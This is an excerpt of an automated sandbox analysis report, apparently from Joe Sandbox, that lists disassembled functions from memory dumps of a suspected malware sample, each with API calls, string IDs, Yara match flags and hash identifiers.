                                                • Opcode Fuzzy Hash: 763e4a14a1476fea278d585dab10dabfb5d17371b066c90e302f9cae630bd372
                                                • Instruction Fuzzy Hash: 5601DB71F05248CFC720EBA4ED4196A7760AB15304F90017EE51967391D6785D41874F
                                                Function 04D07810 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                Download Yara Rule
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 04D0787E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID: Init_thread_footer
                                                • String ID: CD^O$_DC[
                                                • API String ID: 1385522511-3597986494
                                                • Opcode ID: 7341acffab0f8a50cb3dab6dc950932259dbe6591db13ae44b5a8b6a513e7e4b
                                                • Instruction ID: 29616861664ccf82fd99b5c3f471ce708fba2fd4307b1426c64272f2ceb2adaf
                                                • Opcode Fuzzy Hash: 7341acffab0f8a50cb3dab6dc950932259dbe6591db13ae44b5a8b6a513e7e4b
                                                • Instruction Fuzzy Hash: B201F970F043549BC720EFB8AD51BAD7360EB18315F9082B9D1155B2D1EBB4B541CB99
                                                Function 04D07250 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                Download Yara Rule
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 04D072BE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID: Init_thread_footer
                                                • String ID: CD^O$_DC[
                                                • API String ID: 1385522511-3597986494
                                                • Opcode ID: 1a70cf315e0b4c7e3d836be999733c222d33353a0e53b5b2c205e893295131da
                                                • Instruction ID: 67b41bf4fea855232aecff75476d19b09ff746544a2bb70f0378110791ebaebc
                                                • Opcode Fuzzy Hash: 1a70cf315e0b4c7e3d836be999733c222d33353a0e53b5b2c205e893295131da
                                                • Instruction Fuzzy Hash: 5501F9B1F00248DFC720EFB8AD51B6D7360EB15304FA042A9E5195B2D0E7747541CB56
                                                Function 04B68677 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 04B69EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B69EF7
                                                  • Part of subcall function 04B69EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B69F34
                                                • __Init_thread_footer.LIBCMT ref: 04B686E5
                                                  • Part of subcall function 04B69EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B69EAC
                                                  • Part of subcall function 04B69EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B69EDF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                • String ID: CD^O$_DC[
                                                • API String ID: 4132704954-3597986494
                                                • Opcode ID: 7341acffab0f8a50cb3dab6dc950932259dbe6591db13ae44b5a8b6a513e7e4b
                                                • Instruction ID: 92e142771ffdf2e382be81bdbe006d865701c3eb5bd01b7da73c64e893db0b1b
                                                • Opcode Fuzzy Hash: 7341acffab0f8a50cb3dab6dc950932259dbe6591db13ae44b5a8b6a513e7e4b
                                                • Instruction Fuzzy Hash: 1901F970F08358DBD720FF7DAD41A5D73A0EB19210F9005A9D11657350DB78B985CB89
                                                Function 04B680B7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 04B69EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B69EF7
                                                  • Part of subcall function 04B69EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B69F34
                                                • __Init_thread_footer.LIBCMT ref: 04B68125
                                                  • Part of subcall function 04B69EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B69EAC
                                                  • Part of subcall function 04B69EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B69EDF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                • String ID: CD^O$_DC[
                                                • API String ID: 4132704954-3597986494
                                                • Opcode ID: 1a70cf315e0b4c7e3d836be999733c222d33353a0e53b5b2c205e893295131da
                                                • Instruction ID: 286eae8572910f8fd18f89a5e6f1ec8c7e118476eda1404144ba1a6d9747158b
                                                • Opcode Fuzzy Hash: 1a70cf315e0b4c7e3d836be999733c222d33353a0e53b5b2c205e893295131da
                                                • Instruction Fuzzy Hash: 5B0149B1F01208DFCB20FF68FC41A6D73A0EB1A200FA001A9E41A5B350D73869868B46
                                                Function 00407800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                                  • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                                • __Init_thread_footer.LIBCMT ref: 00407869
                                                  • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                                  • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                                  • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                • String ID: DCDO$EDO*
                                                • API String ID: 2296764815-3480089779
                                                • Opcode ID: c1255349a2e57ad23b9470b93f2817b8619d13366b065ca6f952b4fb9d144549
                                                • Instruction ID: 2c0c492e7e72bdb30d52bd5223af33e2dc0730c32d16496d374a94bf7777f62b
                                                • Opcode Fuzzy Hash: c1255349a2e57ad23b9470b93f2817b8619d13366b065ca6f952b4fb9d144549
                                                • Instruction Fuzzy Hash: 5B016275F08208DBDB20EFA5D842E5DB7B0AB14708F50417ED916A7791DA38AD02CF4D
                                                Function 00407910 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                                  • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                                • __Init_thread_footer.LIBCMT ref: 00407979
                                                  • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                                  • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                                  • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                • String ID: DCDO$^]E*
                                                • API String ID: 2296764815-2708296792
                                                • Opcode ID: ffab40d94f7747eb7ab79d41521036dd22da8b0a9ae6696f2e7e2344855eaeaf
                                                • Instruction ID: a49365da1333b78fae32507e70f919b170a79118b3a39b38b1efb03faeb462bb
                                                • Opcode Fuzzy Hash: ffab40d94f7747eb7ab79d41521036dd22da8b0a9ae6696f2e7e2344855eaeaf
                                                • Instruction Fuzzy Hash: 92011DB0F042089BD720EFA9E883A9DB7A0A784704F90417FE919A7391D6396D81CF4D
                                                Function 04D06C00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                Download Yara Rule
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 04D06C69
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID: Init_thread_footer
                                                • String ID: DCDO$EDO*
                                                • API String ID: 1385522511-3480089779
                                                • Opcode ID: 0c4b274b1f736970c2523dd1c5506a016ef446dce9cac0d32a5329abb2f60a7d
                                                • Instruction ID: b5e856f7396c3c60b266ce565ba433e5d85438ef20bebead108bd85afd4598a2
                                                • Opcode Fuzzy Hash: 0c4b274b1f736970c2523dd1c5506a016ef446dce9cac0d32a5329abb2f60a7d
                                                • Instruction Fuzzy Hash: 0D016D74F04208DBDB20DFA4E851F5DBBB0EB14708F9081BAD915977D0DA34A902CF59
                                                Function 04D06D10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                Download Yara Rule
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 04D06D79
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID: Init_thread_footer
                                                • String ID: DCDO$^]E*
                                                • API String ID: 1385522511-2708296792
                                                • Opcode ID: 11f08cc739a34c9adf3450d8bd9b345e73f0704a249345ec43240eb2c7ab1f2c
                                                • Instruction ID: 579b023d7285c4c03fa239704512789439a77be56487fb9fb6d8defeb7330fa5
                                                • Opcode Fuzzy Hash: 11f08cc739a34c9adf3450d8bd9b345e73f0704a249345ec43240eb2c7ab1f2c
                                                • Instruction Fuzzy Hash: 1F0136B0F00208DFD720EFA8D89279D77B0E744704F9081BAE919573D0D635A985CF59
                                                Function 04B67A67 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 04B69EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B69EF7
                                                  • Part of subcall function 04B69EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B69F34
                                                • __Init_thread_footer.LIBCMT ref: 04B67AD0
                                                  • Part of subcall function 04B69EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B69EAC
                                                  • Part of subcall function 04B69EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B69EDF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                • String ID: DCDO$EDO*
                                                • API String ID: 4132704954-3480089779
                                                • Opcode ID: 0c4b274b1f736970c2523dd1c5506a016ef446dce9cac0d32a5329abb2f60a7d
                                                • Instruction ID: a48645c52fb5a95fe754599e3458041630d54a079015420d0b6f79af3dffcf64
                                                • Opcode Fuzzy Hash: 0c4b274b1f736970c2523dd1c5506a016ef446dce9cac0d32a5329abb2f60a7d
                                                • Instruction Fuzzy Hash: 8E01F4B0F04208DBDB20DFA4E841E5CB7B0EB14308F9045BAC806A7390CA38BA07CF49
                                                Function 04B67B77 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 04B69EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B69EF7
                                                  • Part of subcall function 04B69EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B69F34
                                                • __Init_thread_footer.LIBCMT ref: 04B67BE0
                                                  • Part of subcall function 04B69EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B69EAC
                                                  • Part of subcall function 04B69EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B69EDF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                • String ID: DCDO$^]E*
                                                • API String ID: 4132704954-2708296792
                                                • Opcode ID: 11f08cc739a34c9adf3450d8bd9b345e73f0704a249345ec43240eb2c7ab1f2c
                                                • Instruction ID: f8b868fc1d68ae16bc55c6a6c9b5d32319e33e9440664e195cf2df43ae141cdd
                                                • Opcode Fuzzy Hash: 11f08cc739a34c9adf3450d8bd9b345e73f0704a249345ec43240eb2c7ab1f2c
                                                • Instruction Fuzzy Hash: D901C8F0F00208DFDB20DFA9E882A9D77B0E744304F9041BAE81A57390DA39B985CF49